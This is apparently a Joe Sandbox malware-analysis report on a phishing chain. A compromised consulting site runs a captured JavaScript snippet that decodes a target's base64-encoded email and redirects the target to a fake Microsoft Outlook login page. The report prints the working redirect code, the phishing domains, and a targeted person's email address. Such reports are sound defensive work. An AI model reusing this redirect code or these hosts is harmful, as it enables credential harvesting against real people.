https://www.ofiledr.icu/auth?email=bjparish@steinborn.com&sessid=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ==	false	Avira URL Cloud: phishing	unknown
https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com	true		unknown
https://chiltonconsultingllc.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1	false	Avira URL Cloud: safe	unknown
https://www.ofiledr.icu/?email=YmpwYXJpc2hAc3RlaW5ib3JuLmNvbQ==	false	Avira URL Cloud: safe	unknown
https://opacks.online/	true	Avira URL Cloud: safe	unknown
https://www.ofiledr.icu/auth/auth.php	false	Avira URL Cloud: phishing	unknown
https://chiltonconsultingllc.com/	true	Avira URL Cloud: safe	unknown
https://www.ofiledr.icu/auth/resources/segoeui-regular.ttf	false	Avira URL Cloud: phishing	unknown
https://www.ofiledr.icu/auth/resources/favicon.ico	false	Avira URL Cloud: phishing	unknown
https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com	true		unknown
https://www.ofiledr.icu/auth/resources/segoeui-semilight.ttf	false	Avira URL Cloud: phishing	unknown
https://www.ofiledr.icu/index.php?csrftoken=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ==	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://chiltonconsultingllc.com/feed/	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/js/init.js?ver=13.0.5	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/css/off-canvas/core.css?ver=13.0.5	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_f	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/waypoints.js?ver=4.0.2	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/uploads/2021/12/international-trade.jpg	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-json/	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/uploads/2021/12/Captura-de-Pantalla-2021-12-20-a-las-09.	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/plugins/salient-social/css/style.css?ver=1.2	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://regenbogen-kueche.de/clean/token/referrer=	chromecache_64.2.dr, chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/history/	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/css/skin-material.css?ver=13.0.5	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/uploads/2022/05/Captura-de-Pantalla-2022-05-06-a-las-10.	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://www.ofiledr.icu/?email=	chromecache_64.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/css/font-awesome-legacy.min.css?ver=4.7.1	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://ozxa.xyz/#	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/js/priority.js?ver=13.0.5	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/css/style.css?ver=13.0.5	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/uploads/salient/menu-dynamic.css?ver=88696	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-json/wp/v2/pages/12	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/css/salient-dynamic-styles.css?ver=89431	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/transit.js?ver=0.9.9	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/css/responsive.css?ver=13.0.5	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/jquery.fancybox.min.js?ver	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/comments/feed/	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/services/	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/uploads/2021/12/international-trade-300x169.jpg	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/xmlrpc.php?rsd	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
http://www.ascenderfonts.com/info/webfont-eula.aspx	chromecache_67.2.dr, chromecache_63.2.dr	false	Avira URL Cloud: safe	unknown
https://www.web-api.top/?email=	chromecache_64.2.dr, chromecache_66.2.dr	false	Avira URL Cloud: phishing	unknown
https://api.w.org/	chromecache_66.2.dr	false		high
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/jquery.easing.js?ver=1.3	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/css/elements/asset-reveal-animation.css?v	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/plugins/salient-social/js/salient-social.js?ver=1.2	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/plugins/salient-core/js/third-party/touchswipe.min.js?ve	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com	chromecache_66.2.dr	true	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/css/elements/element-cascading-images.css	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/plugins/salient-portfolio/js/third-party/imagesLoaded.mi	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/css/grid-system.css?ver=13.0.5	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/jquery.mousewheel.js?ver=3	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/plugins/js_composer_salient/assets/css/js_composer.min.c	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/intersection-observer.js?v	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/css/off-canvas/slide-out-right-hover.css?	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/superfish.js?ver=1.5.8	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fchiltonconsultingllc.com	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/contact/	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/uploads/2021/12/cranes-offloading-cargo-from-ship-on-to-	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/js/third-party/hoverintent.js?ver=1.9	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/uploads/2022/05/ChiltonConsultingllc_1.png	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://www.kaandlarugs.com/vincar/token/referrer=	chromecache_64.2.dr, chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown
https://opacks.online/#	chromecache_66.2.dr	true	Avira URL Cloud: safe	unknown
https://chiltonconsultingllc.com/wp-content/themes/salient/css/plugins/jquery.fancybox.css?ver=3.3.1	chromecache_66.2.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
111.90.140.55	opacks.online	Malaysia	45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true
111.90.140.57	www.ofiledr.icu	Malaysia	45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	false
216.58.206.36	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.67.147.135	chiltonconsultingllc.com	United States	13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590097
Start date and time:	2025-01-13 15:27:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://chiltonconsultingllc.com/#YmpwYXJpc2gkc3RlaW5ib3JuLmNvbQ==
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.phis.win@19/21@10/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.181.227, 142.250.186.142, 173.194.76.84, 172.217.18.110, 172.217.16.206, 142.250.184.206, 142.250.185.206, 216.58.212.174, 142.250.74.202, 172.217.16.138, 172.217.16.202, 142.250.184.202, 142.250.185.202, 142.250.185.106, 142.250.185.234, 142.250.186.170, 216.58.206.42, 142.250.186.106, 142.250.184.234, 142.250.186.138, 172.217.18.10, 142.250.181.234, 142.250.185.170, 216.58.212.138, 142.250.185.238, 142.250.186.174, 142.250.186.78, 142.250.185.110, 142.250.185.99, 142.250.186.46, 142.250.186.110, 2.23.242.162, 52.149.20.212, 4.245.163.56
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, slscr.update.microsoft.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://chiltonconsultingllc.com/#YmpwYXJpc2gkc3RlaW5ib3JuLmNvbQ==

Input	Output
URL: https://chiltonconsultingllc.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://chiltonconsultingllc.com
URL: https://opacks.online/#YmpwYXJpc2hAc3RlaW5ib3JuLmN... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script demonstrates several high-risk behaviors, including data exfiltration, redirects to suspicious domains, and the use of obfuscated code. The script decodes a base64-encoded email address from the URL hash and then redirects the user to various external domains, potentially for malicious purposes such as phishing or credential harvesting." }
function validateEmail(referrer) { var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)\|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])\|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/; return re.test(referrer); } decodeBase64 = function(s) { var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length; var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; for(i=0;i<64;i++){e[A.charAt(i)]=i;} for(x=0;x<L;x++){ c=e[s.charAt(x)];b=(b<<6)+c;l+=6; while(l>=8){((a=(b>>>(l-=8))&0xff)\|\|(x<(L-2)))&&(r+=w(a));} } return r; } //var ramp = window.location.hash.substring(1); var hash = window.location.hash.substring(1); var email = decodeBase64(hash); console.log(email); if(validateEmail(email)) { console.log(email); window.location = "https://www.ofiledr.icu/?email="+hash; //window.location = "https://www.web-api.top/?email="+hash; //window.location = "https://regenbogen-kueche.de/clean/token/referrer="+email; //window.location = "https://www.kaandlarugs.com/vincar/token/referrer="+ramp; }
URL: https://www.ofiledr.icu/check.php?tap=p7mBCg9W07nE... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "This script appears to be a simple form auto-submit behavior, which is a common practice for improving user experience. While the use of `setTimeout` to delay the form submission could be considered a low-risk indicator, the overall behavior is likely benign and does not demonstrate any clear malicious intent." }
window.onload=function(){ window.setTimeout(document.myform.submit.bind(document.myform),1500); };
URL: https://chiltonconsultingllc.com/#YmpwYXJpc2gkc3Rl... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of base64 encoding and obfuscation techniques further increases the risk. While the script appears to be validating an email address, the subsequent redirection to various domains, some of which are suspicious, suggests a malicious intent." }
function validateEmail(referrer) { var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)\|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])\|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/; return re.test(referrer); } decodeBase64 = function(s) { var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length; var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; for(i=0;i<64;i++){e[A.charAt(i)]=i;} for(x=0;x<L;x++){ c=e[s.charAt(x)];b=(b<<6)+c;l+=6; while(l>=8){((a=(b>>>(l-=8))&0xff)\|\|(x<(L-2)))&&(r+=w(a));} } return r; } //var ramp = window.location.hash.substring(1); var hash = window.location.hash.substring(1); var email = decodeBase64(hash); var email64 = decodeBase64(hash); var email2 = email64.replace('$', '@'); var hash2 = btoa(email2); console.log(email); if(validateEmail(email2)) { console.log(email); window.location = "https://opacks.online/#"+hash2; //window.location = "https://ozxa.xyz/#"+hash; //window.location = "https://www.web-api.top/?email="+hash; //window.location = "https://regenbogen-kueche.de/clean/token/referrer="+email; //window.location = "https://www.kaandlarugs.com/vincar/token/referrer="+ramp; }
URL: https://www.ofiledr.icu/check.php?tap=p7mBCg9W07nE... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "This script appears to be a vendor-specific workaround for a known issue with the IE Mobile 10.0 browser. It does not exhibit any high-risk behaviors and is likely a legitimate performance optimization. The script is simple and does not attempt any data exfiltration, dynamic code execution, or other suspicious activities." }
(function() { if ("-ms-user-select"in document.documentElement.style && navigator.userAgent.match(/IEMobile\/10\.0/)) { var msViewportStyle = document.createElement("style"); msViewportStyle.appendChild(document.createTextNode("@-ms-viewport{width:auto!important}")); document.getElementsByTagName("head")[0].appendChild(msViewportStyle); } } )();
URL: https://www.ofiledr.icu/auth/login.php?c=UKlJ&repl... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript code appears to be a legitimate login page script with some standard functionality, such as handling cookie-based user preferences and browser compatibility checks. While it contains some potentially risky behaviors like using `document.execCommand()` and `eval()`, these seem to be used in a limited and controlled manner. Additionally, the script does not exhibit any clear signs of malicious intent or data exfiltration. Overall, the risk score is low, as the script appears to be part of a legitimate web application." }
// flogon.js // // This file contains the script used by Logon.aspx // //Copyright (c) 2003-2006 Microsoft Corporation. All rights reserved. /// <summary> /// OnLoad handler for logon page /// </summary> window.onload = function () { // If we are replacing the current window with the logon page, initialize the logon page UI now // if (a_fRC) initLogon(); // Otherwise we need to find the window to replace with the logon page and redirect that window // else redir(); }; /// <summary> /// Initializes the logon page /// </summary> function initLogon() { try { // // we don't call document.execCommand("ClearAuthenticationCache","false"); anymore. As a part of the Pending-Notification // infrastructure, we are making a change to make sure startpage does not get loaded more than once. This solution is cookie // based. This execCommand was clearing all cookies in the scenario when a user logged on from a child window during an // FBA timeout. We do not want that to happen anymore. If this breaks anything, we may need to consider a different solution. // // Old Comments: // If the "Clear the Authentication Cache" flag is set to true and // we are coming from the logoff page , clear the cache. See bug 41770 and 5840 for details. // // Logoff the S-Mime control. // LogoffMime(); } catch (e) { } // Check for username cookie // var re = /(^\|; )logondata=acc=([0\|1])&lgn=([^;]+)(;\|$)/; var rg = re.exec(document.cookie); if (rg) { // Fill in username, set security to private, and restore the "use basic" selection // gbid("username").value = rg[3]; try { var signInErrorElement = gbid("signInErrorDiv"); if (signInErrorElement) { signInErrorElement.focus(); } else { gbid("password").focus(); } } catch (e) {} if (gbid("chkPrvt") && !gbid("chkPrvt").checked) { gbid("chkPrvt").click(); } if (rg[2] == "1" && gbid("chkBsc")) // chkBsc doesn't exist if the request comes from ECP gbid("chkBsc").click(); } else { // The variable g_fFcs is set to false when the password gains focus, // so that we don't accidentally set focus to the username field while // the user is typing their password // if (g_fFcs) { try { gbid("username").focus(); } catch (e) { } } } // OWA Premium currently supports // IE 7+, Safari 3+, Firefox 3+ for Windows / Mac if (IsOwaPremiumBrowser() && gbid("chkBsc")) // chkBsc doesn't exist if the request comes from ECP gbid("chkBsc").disabled = false; // Are cookies enabled? // var sCN = "cookieTest"; document.cookie = sCN + "=1"; var cookiesEnabled = document.cookie.indexOf(sCN + "=") != -1; if (cookiesEnabled == false) { shw(gbid("cookieMsg")); hd(gbid("lgnDiv")); } // Show the public/private warning message clkSec(); } /// <summary> /// Finds the frame we want to load the logon page into, and then loads it there /// </summary> function redir() { var o = window; // If we're in a dialog, open a logon window and close the dialog - this // basically inlines a version of opnWin() so that we don't need to include // uglobal.js in logon.aspx // try { if (o.dialogArguments) { var sWN = new String(Math.round(Math.random() * 100000)); var sF = "toolbar=0,location=0,directories=0,status=1,menubar=0,scrollbars=1,resizable=1,width=800,height=600"; var iT = Math.round((screen.availHeight - 600) / 2); var iL =
URL: https://www.ofiledr.icu/auth/login.php?c=UKlJ&repl... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a legitimate login-related functionality with placeholder text and password visibility toggling. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or redirects to suspicious domains. The script's behavior is consistent with typical login page functionality, and it uses common DOM manipulation techniques. While it includes some legacy practices like `document.write()`, the overall risk is low, and the script is likely part of a legitimate application." }
var mainLogonDiv = window.document.getElementById("mainLogonDiv"); var showPlaceholderText = false; var mainLogonDivClassName = 'mouse'; if (mainLogonDivClassName == "tnarrow") { showPlaceholderText = true; // Output meta tag for viewport suserng document.write('<meta name="viewport" content="width = 320, initial-scale = 1.0, user-scalable = no" />'); } else if (mainLogonDivClassName == "twide"){ showPlaceholderText = true; } function setPlaceholderText() { window.document.getElementById("username").placeholder = "user name"; window.document.getElementById("password").placeholder = "password"; window.document.getElementById("passwordText").placeholder = "password"; } function showPasswordClick() { var showPassword = window.document.getElementById("showPasswordCheck").checked; passwordElement = window.document.getElementById("password"); passwordTextElement = window.document.getElementById("passwordText"); if (showPassword) { passwordTextElement.value = passwordElement.value; passwordElement.style.display = "none"; passwordTextElement.style.display = "inline"; passwordTextElement.focus(); } else { passwordElement.value = passwordTextElement.value; passwordTextElement.style.display = "none"; passwordTextElement.value = ""; passwordElement.style.display = "inline"; passwordElement.focus(); } }
URL: https://www.ofiledr.icu/check.php?tap=p7mBCg9W07nEY2tzReNHAdQeksgfGq8fpkT2ic5rQTwbmLPI4F72lQtlllUBG4fWmoBFzfvss4U0MBVOWWdYCdNaTF0sTXUuEu9T2lovHJzG5JEQkPJicANgAMo08Nkg Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://www.ofiledr.icu/check.php?tap=p7mBCg9W07nEY2tzReNHAdQeksgfGq8fpkT2ic5rQTwbmLPI4F72lQtlllUBG4fWmoBFzfvss4U0MBVOWWdYCdNaTF0sTXUuEu9T2lovHJzG5JEQkPJicANgAMo08Nkg Model: Joe Sandbox AI	{ "brands": [ "Outlook" ] }
	{ "brands": [ "Outlook" ] }
URL: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "sign in", "text_input_field_labels": [ "Email address:", "Password:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com Model: Joe Sandbox AI	{ "brands": [ "Microsoft Outlook" ] }
	{ "brands": [ "Microsoft Outlook" ] }
URL: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com Model: Joe Sandbox AI	```json{ "legit_domain": "outlook.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft Outlook' is well-known and typically associated with the domain 'outlook.com'.", "The URL 'www.ofiledr.icu' does not match the legitimate domain 'outlook.com'.", "The domain extension '.icu' is unusual for a well-known brand like Microsoft Outlook.", "The domain name 'ofiledr' does not resemble 'outlook' and may be a misspelling or an attempt to deceive users.", "The presence of input fields for 'Email address' and 'Password' is typical for phishing sites attempting to harvest credentials." ], "riskscore": 9} Google indexed: False
URL: www.ofiledr.icu Brands: Microsoft Outlook Input Fields: Email address:, Password:
URL: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "sign in", "text_input_field_labels": [ "Email address:", "Password:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com Model: Joe Sandbox AI	{ "brands": [ "Outlook" ] }
	{ "brands": [ "Outlook" ] }
URL: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com Model: Joe Sandbox AI	```json{ "legit_domain": "outlook.com", "classification": "wellknown", "reasons": [ "The brand 'Outlook' is well-known and is associated with Microsoft.", "The legitimate domain for Outlook is 'outlook.com'.", "The provided URL 'www.ofiledr.icu' does not match the legitimate domain for Outlook.", "The domain extension '.icu' is unusual for a well-known brand like Outlook.", "The domain name 'ofiledr' does not resemble 'outlook' and may be a misspelling or unrelated.", "The presence of input fields for email and password is typical for phishing sites attempting to capture user credentials." ], "riskscore": 9} Google indexed: False
URL: www.ofiledr.icu Brands: Outlook Input Fields: Email address:, Password:

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 13:28:12 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9843566431719117
Encrypted:	false
SSDEEP:	48:8ndhQTB0obmHmidAKZdA1FehwiZUklqehHMy+3:8MXTmMy
MD5:	7675088E398C319F064440430F99981D
SHA1:	522C3FC13BCD45767C12293B7B18B4B410CE37C6
SHA-256:	071B79BF08B227FFDA3B48BE50CE3ED1DE77FBBA5F383DEF94C9723E944DAFB6
SHA-512:	D129EF46F1DE00EBFBD773F04D24EBD03007521295F5153E02BD807DA402A10515BB1ADBF94EDF43AF1CD94C40DC2E6515A2E4AE58C2F51D3CC65443D9E290AB
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....u.`.e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-Zys....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Z.s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Z.s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Z.s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Z.s...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 13:28:12 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.001924427833618
Encrypted:	false
SSDEEP:	48:8MdhQTB0obmHmidAKZdA1seh/iZUkAQkqehWMy+2:81X99QBMy
MD5:	A1643F3F87471645D7D4D1257F56E7B3
SHA1:	519D8D9A8EA04B78FC49C7B6FA3BFB839A2B4A78
SHA-256:	B5B275589CC0C8BDA2B9CE600295F5017C88FC5441DAD98B1BA41DBFD32697C0
SHA-512:	248EEF359D76B0CCC8019333425AEF24D7B7DBB7BF9716A03D24D8C4DE9642AFFA1DA4A81E4755589D269551DDCC030278D661FC1D5D5EC0EEA92460525DA472
Malicious:	false
Reputation:	low
